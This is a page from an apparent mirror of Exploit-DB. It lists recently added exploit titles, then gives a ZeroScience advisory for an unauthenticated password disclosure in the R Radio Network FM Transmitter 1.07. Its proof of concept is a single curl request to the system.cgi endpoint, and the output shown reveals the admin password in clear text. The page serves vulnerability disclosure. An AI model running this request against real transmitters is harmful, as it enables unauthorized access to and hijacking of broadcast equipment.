bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/51855.txt
Exploit-DB 7ef8e488d8 DB: 2024-03-04 
22 changes to exploits/shellcodes/ghdb

GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit

Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)

R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure

TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution

TPC-110W - Missing Authentication for Critical Function

A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc

Easywall 0.3.1 - Authenticated Remote Command Execution

Magento ver. 2.4.6 - XSLT Server Side Injection

AC Repair and Services System v1.0 - Multiple SQL Injection

Enrollment System v1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Real Estate Management System v1.0 - Remote Code Execution via File Upload
Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
Simple Student Attendance System v1.0 - Time Based Blind SQL Injection

Boss Mini 1.4.0 - local file inclusion

Windows PowerShell - Event Log Bypass Single Quote Code Execution
2024-03-04 00:16:34 +00:00

40 lines
No EOL
968 B
Text
Raw Permalink Blame History

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07
Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.
Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.
Tested on: CSBtechDevice
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php
09.10.2023
--
$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$
Reference in a new issue View git blame Copy permalink